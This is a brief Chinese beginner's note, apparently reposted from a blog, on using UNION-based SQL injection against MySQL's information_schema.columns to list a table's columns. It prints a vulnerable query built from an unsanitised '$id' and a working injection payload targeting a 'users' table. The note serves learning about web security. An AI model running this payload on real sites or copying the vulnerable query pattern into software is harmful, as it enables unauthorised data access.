7.sql injection之获取当前表的所有列(列也叫字段)-------小白笔记

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

1.版本在5.0及以上的mysql服务器特点: ①利用information_schema.columns表 ②information_schema.columns表,存储着所有表中的所有列 2.爆列过程: ①源码:select first_name,last_name from users where id ='$id' ②构造语句:1' union select column_name,2 from information_schema.columns where table_name='users'# ③真正执行的语句:select frist_name,last_name from users where id =’ 1' union select column_name,2 from information_schema.columns where table_name='users'# ’

3.group_concat()函数,可以一行显示多行信息 4.列,也就是相对表来说,是表的字段信息

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/102882956
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复